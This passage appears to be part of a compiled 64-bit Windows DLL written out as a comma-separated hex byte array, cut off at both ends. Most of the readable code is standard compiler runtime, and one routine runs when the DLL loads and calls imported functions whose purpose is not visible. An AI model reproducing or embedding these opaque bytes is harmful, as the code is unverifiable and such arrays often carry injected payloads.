,0xe8 ,0x42 ,0x17 ,0x00 ,0x00 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0x5f ,0x5d ,0x41 ,0x5c ,0x41 ,0x5d ,0xc3 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x83 ,0xfa ,0x01 ,0x0f ,0x85 ,0xaa ,0x00 ,0x00 ,0x00 ,0x65 ,0x48 ,0x8b ,0x04 ,0x25 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8b ,0x1d ,0xb7 ,0x31 ,0x00 ,0x00 ,0x31 ,0xff ,0x48 ,0x8b ,0x70 ,0x08 ,0x48 ,0x8b ,0x2d ,0x52 ,0x81 ,0x00 ,0x00 ,0xeb ,0x18 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x39 ,0xc6 ,0x0f ,0x84 ,0xb7 ,0x00 ,0x00 ,0x00 ,0xb9 ,0xe8 ,0x03 ,0x00 ,0x00 ,0xff ,0xd5 ,0x48 ,0x89 ,0xf8 ,0xf0 ,0x48 ,0x0f ,0xb1 ,0x33 ,0x48 ,0x85 ,0xc0 ,0x75 ,0xe3 ,0x31 ,0xff ,0x48 ,0x8b ,0x35 ,0x8a ,0x31 ,0x00 ,0x00 ,0x8b ,0x06 ,0x83 ,0xf8 ,0x01 ,0x0f ,0x84 ,0xef ,0x00 ,0x00 ,0x00 ,0x8b ,0x06 ,0x85 ,0xc0 ,0x0f ,0x84 ,0xa5 ,0x00 ,0x00 ,0x00 ,0x8b ,0x06 ,0x83 ,0xf8 ,0x01 ,0x0f ,0x84 ,0xba ,0x00 ,0x00 ,0x00 ,0x85 ,0xff ,0x0f ,0x84 ,0x82 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8b ,0x05 ,0x1b ,0x31 ,0x00 ,0x00 ,0x48 ,0x8b ,0x00 ,0x48 ,0x85 ,0xc0 ,0x74 ,0x0d ,0x4d ,0x89 ,0xe8 ,0xba ,0x02 ,0x00 ,0x00 ,0x00 ,0x4c ,0x89 ,0xe1 ,0xff ,0xd0 ,0x83 ,0x05 ,0xd7 ,0x5e ,0x00 ,0x00 ,0x01 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0x5f ,0x5d ,0x41 ,0x5c ,0x41 ,0x5d ,0xc3 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0x5f ,0x5d ,0x41 ,0x5c ,0x41 ,0x5d ,0xc3 ,0x48 ,0x8d ,0x0d ,0x94 ,0x5e ,0x00 ,0x00 ,0xe8 ,0x5f ,0x17 ,0x00 ,0x00 ,0xc7 ,0x07 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x87 ,0x33 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0x5f ,0x5d ,0x41 ,0x5c ,0x41 ,0x5d ,0xc3 ,0x0f ,0x1f ,0x40 ,0x00 ,0xbf ,0x01 ,0x00 ,0x00 ,0x00 ,0xe9 ,0x55 ,0xff ,0xff ,0xff ,0x66 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0x31 ,0xc0 ,0x48 ,0x87 ,0x03 ,0xe9 ,0x74 ,0xff ,0xff ,0xff ,0x66 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0x48 ,0x8b ,0x15 ,0x09 ,0x31 ,0x00 ,0x00 ,0xc7 ,0x06 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8b ,0x0d ,0xec ,0x30 ,0x00 ,0x00 ,0xe8 ,0xf7 ,0x15 ,0x00 ,0x00 ,0xe9 ,0x3d ,0xff ,0xff ,0xff ,0x66 ,0x90 ,0x48 ,0x8b ,0x15 ,0xc9 ,0x30 ,0x00 ,0x00 ,0x48 ,0x8b ,0x0d ,0xb2 ,0x30 ,0x00 ,0x00 ,0xe8 ,0xdd ,0x15 ,0x00 ,0x00 ,0xc7 ,0x06 ,0x02 ,0x00 ,0x00 ,0x00 ,0xe9 ,0x28 ,0xff ,0xff ,0xff ,0x66 ,0x90 ,0xb9 ,0x1f ,0x00 ,0x00 ,0x00 ,0xe8 ,0xce ,0x15 ,0x00 ,0x00 ,0xe9 ,0x0c ,0xff ,0xff ,0xff ,0x90 ,0x41 ,0x54 ,0x55 ,0x57 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x20 ,0x48 ,0x8b ,0x35 ,0x4f ,0x30 ,0x00 ,0x00 ,0x85 ,0xd2 ,0x48 ,0x89 ,0xcf ,0x89 ,0xd3 ,0x89 ,0x16 ,0x4c ,0x89 ,0xc5 ,0x75 ,0x54 ,0x8b ,0x05 ,0xf3 ,0x5d ,0x00 ,0x00 ,0x85 ,0xc0 ,0x74 ,0x33 ,0xe8 ,0x62 ,0x07 ,0x00 ,0x00 ,0x49 ,0x89 ,0xe8 ,0x31 ,0xd2 ,0x48 ,0x89 ,0xf9 ,0xe8 ,0xbf ,0x01 ,0x00 ,0x00 ,0x49 ,0x89 ,0xe8 ,0x89 ,0xda ,0x48 ,0x89 ,0xf9 ,0xe8 ,0x28 ,0x15 ,0x00 ,0x00 ,0x49 ,0x89 ,0xe8 ,0x89 ,0xda ,0x48 ,0x89 ,0xf9 ,0x41 ,0x89 ,0xc4 ,0xe8 ,0xb8 ,0xfd ,0xff ,0xff ,0x85 ,0xc0 ,0x75 ,0x03 ,0x45 ,0x31 ,0xe4 ,0x44 ,0x89 ,0xe0 ,0xc7 ,0x06 ,0xff ,0xff ,0xff ,0xff ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5b ,0x5e ,0x5f ,0x5d ,0x41 ,0x5c ,0xc3 ,0xe8 ,0x18 ,0x07 ,0x00 ,0x00 ,0x8d ,0x43 ,0xff ,0x83 ,0xf8 ,0x01 ,0x76 ,0x20 ,0x49 ,0x89 ,0xe8 ,0x89 ,0xda ,0x48 ,0x89 ,0xf9 ,0xe8 ,0x6d ,0x01 ,0x00 ,0x00 ,0x83 ,0xfb ,0x03 ,0x41 ,0x89 ,0xc4 ,0x75 ,0xca ,0xeb ,0xa4 ,0x66 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x49 ,0x89 ,0xe8 ,0x89 ,0xda ,0x48 ,0x89 ,0xf9 ,0xe8 ,0x63 ,0xfd ,0xff ,0xff ,0x85 ,0xc0 ,0x74 ,0xab ,0x49 ,0x89 ,0xe8 ,0x89 ,0xda ,0x48 ,0x89 ,0xf9 ,0xe8 ,0xb2 ,0x14 ,0x00 ,0x00 ,0x85 ,0xc0 ,0x41 ,0x89 ,0xc4 ,0x74 ,0x5b ,0x83 ,0xfb ,0x01 ,0x75 ,0xb6 ,0xe8 ,0x11 ,0x02 ,0x00 ,0x00 ,0x49 ,0x89 ,0xe8 ,0xba ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x89 ,0xf9 ,0xe8 ,0x1b ,0x01 ,0x00 ,0x00 ,0x85 ,0xc0 ,0x41 ,0x89 ,0xc4 ,0x0f ,0x85 ,0x75 ,0xff ,0xff ,0xff ,0x49 ,0x89 ,0xe8 ,0x31 ,0xd2 ,0x48 ,0x89 ,0xf9 ,0xe8 ,0x03 ,0x01 ,0x00 ,0x00 ,0x49 ,0x89 ,0xe8 ,0x31 ,0xd2 ,0x48 ,0x89 ,0xf9 ,0xe8 ,0x6c ,0x14 ,0x00 ,0x00 ,0x49 ,0x89 ,0xe8 ,0x31 ,0xd2 ,0x48 ,0x89 ,0xf9 ,0xe8 ,0xff ,0xfc ,0xff ,0xff ,0xe9 ,0x49 ,0xff ,0xff ,0xff ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x83 ,0xfb ,0x01 ,0x0f ,0x85 ,0x33 ,0xff ,0xff ,0xff ,0xeb ,0xd9 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0x48 ,0x83 ,0xec ,0x48 ,0x48 ,0x8b ,0x05 ,0x95 ,0x2f ,0x00 ,0x00 ,0xc7 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x83 ,0xfa ,0x01 ,0x74 ,0x0a ,0x48 ,0x83 ,0xc4 ,0x48 ,0xe9 ,0xb1 ,0xfe ,0xff ,0xff ,0x90 ,0x4c ,0x89 ,0x44 ,0x24 ,0x38 ,0x89 ,0x54 ,0x24 ,0x34 ,0x48 ,0x89 ,0x4c ,0x24 ,0x28 ,0xe8 ,0x9d ,0x01 ,0x00 ,0x00 ,0xe8 ,0x88 ,0x0a ,0x00 ,0x00 ,0x4c ,0x8b ,0x44 ,0x24 ,0x38 ,0x8b ,0x54 ,0x24 ,0x34 ,0x48 ,0x8b ,0x4c ,0x24 ,0x28 ,0x48 ,0x83 ,0xc4 ,0x48 ,0xe9 ,0x81 ,0xfe ,0xff ,0xff ,0x90 ,0x48 ,0x89 ,0xca ,0x48 ,0x8d ,0x0d ,0x76 ,0x5c ,0x00 ,0x00 ,0xe9 ,0x71 ,0x14 ,0x00 ,0x00 ,0x90 ,0x48 ,0x8d ,0x0d ,0x09 ,0x00 ,0x00 ,0x00 ,0xe9 ,0xe4 ,0xff ,0xff ,0xff ,0x0f ,0x1f ,0x40 ,0x00 ,0xc3 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x55 ,0x48 ,0x89 ,0xe5 ,0x48 ,0x83 ,0xec ,0x20 ,0x41 ,0xb9 ,0x00 ,0x00 ,0x00 ,0x00 ,0x4c ,0x8d ,0x05 ,0x3b ,0x2c ,0x00 ,0x00 ,0x48 ,0x8d ,0x15 ,0x44 ,0x2c ,0x00 ,0x00 ,0xb9 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8b ,0x05 ,0xf8 ,0x7e ,0x00 ,0x00 ,0xff ,0xd0 ,0xba ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0x52 ,0x2c ,0x00 ,0x00 ,0x48 ,0x8b ,0x05 ,0x5b ,0x7e ,0x00 ,0x00 ,0xff ,0xd0 ,0xb8 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5d ,0xc3 ,0x55 ,0x48 ,0x89 ,0xe5 ,0x48 ,0x83 ,0xec ,0x20 ,0x48 ,0x89 ,0x4d ,0x10 ,0x89 ,0x55 ,0x18 ,0x4c ,0x89 ,0x45 ,0x20 ,0x83 ,0x7d ,0x18 ,0x01 ,0x75 ,0x05 ,0xe8 ,0x98 ,0xff ,0xff ,0xff ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5d ,0xc3 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x83 ,0xec ,0x28 ,0x48 ,0x8b ,0x05 ,0xc5 ,0x1b ,0x00 ,0x00 ,0x48 ,0x8b ,0x00 ,0x48 ,0x85 ,0xc0 ,0x74 ,0x1d ,0xff ,0xd0 ,0x48 ,0x8b ,0x05 ,0xb4 ,0x1b ,0x00 ,0x00 ,0x48 ,0x8d ,0x50 ,0x08 ,0x48 ,0x8b ,0x40 ,0x08 ,0x48 ,0x89 ,0x15 ,0xa5 ,0x1b ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x75 ,0xe3 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x90 ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x28 ,0x48 ,0x8b ,0x0d ,0x93 ,0x2d ,0x00 ,0x00 ,0x48 ,0x8b ,0x11 ,0x83 ,0xfa ,0xff ,0x89 ,0xd0 ,0x74 ,0x39 ,0x85 ,0xc0 ,0x74 ,0x20 ,0x89 ,0xc2 ,0x83 ,0xe8 ,0x01 ,0x48 ,0x8d ,0x1c ,0xd1 ,0x48 ,0x29 ,0xc2 ,0x48 ,0x8d ,0x74 ,0xd1 ,0xf8 ,0x0f ,0x1f ,0x40 ,0x00 ,0xff ,0x13 ,0x48 ,0x83 ,0xeb ,0x08 ,0x48 ,0x39 ,0xf3 ,0x75 ,0xf5 ,0x48 ,0x8d ,0x0d ,0x7e ,0xff ,0xff ,0xff ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0xe9 ,0xc3 ,0xfe ,0xff ,0xff ,0x0f ,0x1f ,0x00 ,0x31 ,0xc0 ,0xeb ,0x02 ,0x89 ,0xd0 ,0x44 ,0x8d ,0x40 ,0x01 ,0x4a ,0x83 ,0x3c ,0xc1 ,0x00 ,0x4c ,0x89 ,0xc2 ,0x75 ,0xf0 ,0xeb ,0xb1 ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x8b ,0x05 ,0x3a ,0x5b ,0x00 ,0x00 ,0x85 ,0xc0 ,0x74 ,0x06 ,0xc3 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0xc7 ,0x05 ,0x26 ,0x5b ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xe9 ,0x71 ,0xff ,0xff ,0xff ,0x90 ,0x41 ,0x54 ,0x55 ,0x57 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x30 ,0x48 ,0x8b ,0x1d ,0x4f ,0x1b ,0x00 ,0x00 ,0x48 ,0xb8 ,0x32 ,0xa2 ,0xdf ,0x2d ,0x99 ,0x2b ,0x00 ,0x00 ,0x48 ,0x39 ,0xc3 ,0x48 ,0xc7 ,0x44 ,0x24 ,0x20 ,0x00 ,0x00 ,0x00 ,0x00 ,0x74 ,0x17 ,0x48 ,0xf7 ,0xd3 ,0x48 ,0x89 ,0x1d ,0x3d ,0x1b ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x30 ,0x5b ,0x5e ,0x5f ,0x5d ,0x41 ,0x5c ,0xc3 ,0x66 ,0x90 ,0x48 ,0x8d ,0x4c ,0x24 ,0x20 ,0xff ,0x15 ,0x7d ,0x7c ,0x00 ,0x00 ,0x48 ,0x8b ,0x74 ,0x24 ,0x20 ,0xff ,0x15 ,0x5a ,0x7c ,0x00 ,0x00 ,0x41 ,0x89 ,0xc4 ,0xff ,0x15 ,0x59 ,0x7c ,0x00 ,0x00 ,0x89 ,0xc5 ,0xff ,0x15 ,0x69 ,0x7c ,0x00 ,0x00 ,0x48 ,0x8d ,0x4c ,0x24 ,0x28 ,0x89 ,0xc7 ,0xff ,0x15 ,0x74 ,0x7c ,0x00 ,0x00 ,0x48 ,0x33 ,0x74 ,0x24 ,0x28 ,0x44 ,0x89 ,0xe0 ,0x48 ,0xba ,0xff ,0xff ,0xff ,0xff ,0xff ,0xff ,0x00 ,0x00 ,0x48 ,0x31 ,0xf0 ,0x89 ,0xee ,0x48 ,0x31 ,0xc6 ,0x89 ,0xf8 ,0x48 ,0x31 ,0xf0 ,0x48 ,0x21 ,0xd0 ,0x48 ,0x39 ,0xd8 ,0x74 ,0x25 ,0x48 ,0x89 ,0xc2 ,0x48 ,0xf7 ,0xd2 ,0x48 ,0x89 ,0x05 ,0xb8 ,0x1a ,0x00 ,0x00 ,0x48 ,0x89 ,0x15 ,0xc1 ,0x1a ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x30 ,0x5b ,0x5e ,0x5f ,0x5d ,0x41 ,0x5c ,0xc3 ,0x66 ,0x0f ,0x1f ,0x44 ,0x00 ,0x00 ,0x48 ,0xba ,0xcc ,0x5d ,0x20 ,0xd2 ,0x66 ,0xd4 ,0xff ,0xff ,0x48 ,0xb8 ,0x33 ,0xa2 ,0xdf ,0x2d ,0x99 ,0x2b ,0x00 ,0x00 ,0xeb ,0xcb ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x55 ,0x56 ,0x53 ,0x48 ,0x89 ,0xe5 ,0x48 ,0x83 ,0xec ,0x70 ,0x48 ,0x89 ,0xce ,0x48 ,0x8d ,0x0d ,0x4c ,0x5a ,0x00 ,0x00 ,0xff ,0x15 ,0xfe ,0x7b ,0x00 ,0x00 ,0x48 ,0x8b ,0x1d ,0x37 ,0x5b ,0x00 ,0x00 ,0x48 ,0x8d ,0x55 ,0xd8 ,0x45 ,0x31 ,0xc0 ,0x48 ,0x89 ,0xd9 ,0xff ,0x15 ,0xef ,0x7b ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x0f ,0x84 ,0xa3 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8d ,0x55 ,0xe0 ,0x49 ,0x89 ,0xc1 ,0x49 ,0x89 ,0xd8 ,0x48 ,0xc7 ,0x44 ,0x24 ,0x38 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0x0c ,0x5a ,0x00 ,0x00 ,0x48 ,0x89 ,0x54 ,0x24 ,0x30 ,0x48 ,0x8d ,0x55 ,0xe8 ,0x48 ,0x89 ,0x4c ,0x24 ,0x20 ,0x31 ,0xc9 ,0x48 ,0x89 ,0x54 ,0x24 ,0x28 ,0x48 ,0x8b ,0x55 ,0xd8 ,0xff ,0x15 ,0xb5 ,0x7b ,0x00 ,0x00 ,0x48 ,0x8b ,0x05 ,0xde ,0x5a ,0x00 ,0x00 ,0x31 ,0xc9 ,0x48 ,0x89 ,0x35 ,0x5d ,0x5a ,0x00 ,0x00 ,0x48 ,0x89 ,0x05 ,0xc6 ,0x5e ,0x00 ,0x00 ,0x48 ,0xb8 ,0x09 ,0x04 ,0x00 ,0xc0 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x89 ,0x05 ,0xa5 ,0x5e ,0x00 ,0x00 ,0x48 ,0x8b ,0x05 ,0xde ,0x19 ,0x00 ,0x00 ,0x48 ,0x89 ,0x45 ,0xf0 ,0x48 ,0x8b ,0x05 ,0xe3 ,0x19 ,0x00 ,0x00 ,0x48 ,0x89 ,0x45 ,0xf8 ,0xff ,0x15 ,0x79 ,0x7b ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0xc2 ,0x29 ,0x00 ,0x00 ,0xff ,0x15 ,0x8c ,0x7b ,0x00 ,0x00 ,0xff ,0x15 ,0xfe ,0x7a ,0x00 ,0x00 ,0xba ,0x09 ,0x04 ,0x00 ,0xc0 ,0x48 ,0x89 ,0xc1 ,0xff ,0x15 ,0x68 ,0x7b ,0x00 ,0x00 ,0xe8 ,0xfb ,0x10 ,0x00 ,0x00 ,0x48 ,0x8b ,0x45 ,0x18 ,0x48 ,0x89 ,0x05 ,0x70 ,0x5a ,0x00 ,0x00 ,0x48 ,0x8d ,0x45 ,0x08 ,0x48 ,0x89 ,0x05 ,0x05 ,0x5a ,0x00 ,0x00 ,0xe9 ,0x7b ,0xff ,0xff ,0xff ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x83 ,0xec ,0x28 ,0x83 ,0xfa ,0x03 ,0x74 ,0x17 ,0x85 ,0xd2 ,0x74 ,0x13 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x66 ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x5b ,0x0b ,0x00 ,0x00 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x28 ,0xc3 ,0x90 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x28 ,0x48 ,0x8b ,0x05 ,0xe3 ,0x2a ,0x00 ,0x00 ,0x83 ,0x38 ,0x02 ,0x74 ,0x06 ,0xc7 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x83 ,0xfa ,0x02 ,0x74 ,0x13 ,0x83 ,0xfa ,0x01 ,0x74 ,0x40 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0xc3 ,0x66 ,0x90 ,0x48 ,0x8d ,0x1d ,0x09 ,0x89 ,0x00 ,0x00 ,0x48 ,0x8d ,0x35 ,0x02 ,0x89 ,0x00 ,0x00 ,0x48 ,0x39 ,0xde ,0x74 ,0xdf ,0x48 ,0x8b ,0x03 ,0x48 ,0x85 ,0xc0 ,0x74 ,0x02 ,0xff ,0xd0 ,0x48 ,0x83 ,0xc3 ,0x08 ,0x48 ,0x39 ,0xde ,0x75 ,0xed ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0xc3 ,0xe8 ,0xe9 ,0x0a ,0x00 ,0x00 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x28 ,0x5b ,0x5e ,0xc3 ,0x0f ,0x1f ,0x00 ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x31 ,0xc0 ,0xc3 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x89 ,0xc8 ,0xc3 ,0x66 ,0x90 ,0x66 ,0x2e ,0x0f ,0x1f ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x89 ,0xc8 ,0xc3 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x41 ,0x54 ,0x55 ,0x57 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x50 ,0x48 ,0x63 ,0x35 ,0x13 ,0x5e ,0x00 ,0x00 ,0x85 ,0xf6 ,0x48 ,0x89 ,0xcb ,0x48 ,0x89 ,0xd5 ,0x4c ,0x89 ,0xc7 ,0x0f ,0x8e ,0x66 ,0x01 ,0x00 ,0x00 ,0x48 ,0x8b ,0x05 ,0xff ,0x5d ,0x00 ,0x00 ,0x31 ,0xc9 ,0x48 ,0x83 ,0xc0 ,0x18 ,0x90 ,0x48 ,0x8b ,0x10 ,0x48 ,0x39 ,0xd3 ,0x72 ,0x14 ,0x4c ,0x8b ,0x40 ,0x08 ,0x45 ,0x8b ,0x40 ,0x08 ,0x4c ,0x01 ,0xc2 ,0x48 ,0x39 ,0xd3 ,0x0f ,0x82 ,0x89 ,0x00 ,0x00 ,0x00 ,0x83 ,0xc1 ,0x01 ,0x48 ,0x83 ,0xc0 ,0x28 ,0x39 ,0xf1 ,0x75 ,0xd9 ,0x48 ,0x89 ,0xd9 ,0xe8 ,0x41 ,0x0c ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x49 ,0x89 ,0xc4 ,0x0f ,0x84 ,0x52 ,0x01 ,0x00 ,0x00 ,0x48 ,0x8b ,0x05 ,0xb6 ,0x5d ,0x00 ,0x00 ,0x48 ,0x8d ,0x34 ,0xb6 ,0x48 ,0xc1 ,0xe6 ,0x03 ,0x48 ,0x01 ,0xf0 ,0x4c ,0x89 ,0x60 ,0x20 ,0xc7 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x44 ,0x0d ,0x00 ,0x00 ,0x41 ,0x8b ,0x4c ,0x24 ,0x0c ,0x48 ,0x8d ,0x54 ,0x24 ,0x20 ,0x41 ,0xb8 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x01 ,0xc1 ,0x48 ,0x8b ,0x05 ,0x82 ,0x5d ,0x00 ,0x00 ,0x48 ,0x89 ,0x4c ,0x30 ,0x18 ,0xff ,0x15 ,0xcf ,0x79 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x0f ,0x84 ,0xe6 ,0x00 ,0x00 ,0x00 ,0x8b ,0x44 ,0x24 ,0x44 ,0x8d ,0x50 ,0xfc ,0x83 ,0xe2 ,0xfb ,0x74 ,0x08 ,0x83 ,0xe8 ,0x40 ,0x83 ,0xe0 ,0xbf ,0x75 ,0x62 ,0x83 ,0x05 ,0x4f ,0x5d ,0x00 ,0x00 ,0x01 ,0x83 ,0xff ,0x08 ,0x73 ,0x29 ,0x40 ,0xf6 ,0xc7 ,0x04 ,0x0f ,0x85 ,0x90 ,0x00 ,0x00 ,0x00 ,0x85 ,0xff ,0x74 ,0x10 ,0x0f ,0xb6 ,0x45 ,0x00 ,0x40 ,0xf6 ,0xc7 ,0x02 ,0x88 ,0x03 ,0x0f ,0x85 ,0x97 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xc4 ,0x50 ,0x5b ,0x5e ,0x5f ,0x5d ,0x41 ,0x5c ,0xc3 ,0x89 ,0xf8 ,0x83 ,0xef ,0x01 ,0x48 ,0x8b ,0x54 ,0x05 ,0xf8 ,0x83 ,0xff ,0x08 ,0x48 ,0x89 ,0x54 ,0x03 ,0xf8 ,0x72 ,0xe1 ,0x83 ,0xe7 ,0xf8 ,0x31 ,0xc0 ,0x89 ,0xc2 ,0x83 ,0xc0 ,0x08 ,0x48 ,0x8b ,0x4c ,0x15 ,0x00 ,0x39 ,0xf8 ,0x48 ,0x89 ,0x0c ,0x13 ,0x72 ,0xee ,0xeb ,0xc8 ,0x48 ,0x03 ,0x35 ,0xf1 ,0x5c ,0x00 ,0x00 ,0x41 ,0xb8 ,0x40 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8b ,0x4c ,0x24 ,0x20 ,0x48 ,0x8b ,0x54 ,0x24 ,0x38 ,0x49 ,0x89 ,0xf1 ,0x48 ,0x89 ,0x4e ,0x08 ,0x48 ,0x89 ,0x56 ,0x10 ,0xff ,0x15 ,0x20 ,0x79 ,0x00 ,0x00 ,0x85 ,0xc0 ,0x0f ,0x85 ,0x6e ,0xff ,0xff ,0xff ,0xff ,0x15 ,0x9a ,0x78 ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0x2b ,0x28 ,0x00 ,0x00 ,0x89 ,0xc2 ,0xe8 ,0x1c ,0x11 ,0x00 ,0x00 ,0x8b ,0x45 ,0x00 ,0x89 ,0xff ,0x89 ,0x03 ,0x8b ,0x44 ,0x3d ,0xfc ,0x89 ,0x44 ,0x3b ,0xfc ,0xe9 ,0x70 ,0xff ,0xff ,0xff ,0x31 ,0xf6 ,0xe9 ,0xc8 ,0xfe ,0xff ,0xff ,0x89 ,0xff ,0x0f ,0xb7 ,0x44 ,0x3d ,0xfe ,0x66 ,0x89 ,0x44 ,0x3b ,0xfe ,0xe9 ,0x58 ,0xff ,0xff ,0xff ,0x48 ,0x8b ,0x05 ,0x81 ,0x5c ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0xb2 ,0x27 ,0x00 ,0x00 ,0x41 ,0x8b ,0x54 ,0x24 ,0x08 ,0x4c ,0x8b ,0x44 ,0x30 ,0x18 ,0xe8 ,0xd3 ,0x10 ,0x00 ,0x00 ,0x48 ,0x8d ,0x0d ,0x7c ,0x27 ,0x00 ,0x00 ,0x48 ,0x89 ,0xda ,0xe8 ,0xc4 ,0x10 ,0x00 ,0x00 ,0x90 ,0x0f ,0x1f ,0x00 ,0x55 ,0x41 ,0x57 ,0x41 ,0x56 ,0x41 ,0x55 ,0x41 ,0x54 ,0x57 ,0x56 ,0x53 ,0x48 ,0x83 ,0xec ,0x38 ,0x48 ,0x8d ,0xac ,0x24 ,0x80 ,0x00 ,0x00 ,0x00 ,0x8b ,0x1d ,0x32 ,0x5c ,0x00 ,0x00 ,0x85 ,0xdb ,0x74 ,0x11 ,0x48 ,0x8d ,0x65 ,0xb8 ,0x5b ,0x5e ,0x5f ,0x41 ,0x5c ,0x41 ,0x5d ,0x41 ,0x5e ,0x41 ,0x5f ,0x5d ,0xc3 ,0xc7 ,0x05 ,0x13 ,0x5c ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xe8 ,0x0e ,0x0b ,0x00 ,0x00 ,0x48 ,0x98 ,0x48 ,0x8d ,0x04 ,0x80 ,0x48 ,0x8d ,0x04 ,0xc5 ,0x1e ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xe0 ,0xf0 ,0xe8 ,0x47 ,0x0d ,0x00 ,0x00 ,0x4c ,0x8b ,0x25 ,0x30 ,0x28 ,0x00 ,0x00 ,0xc7 ,0x05 ,0xea ,0x5b ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8b ,0x35 ,0x2f ,0x28 ,0x00 ,0x00 ,0x48 ,0x29 ,0xc4 ,0x48 ,0x8d ,0x44 ,0x24 ,0x20 ,0x48 ,0x89 ,0x05 ,0xd8 ,0x5b ,0x00 ,0x00 ,0x4c ,0x89 ,0xe0 ,0x48 ,0x29 ,0xf0 ,0x48 ,0x83 ,0xf8 ,0x07 ,0x7e ,0x96 ,0x48 ,0x83 ,0xf8 ,0x0b ,0x8b ,0x16 ,0x0f ,0x8e ,0xc8 ,0x00 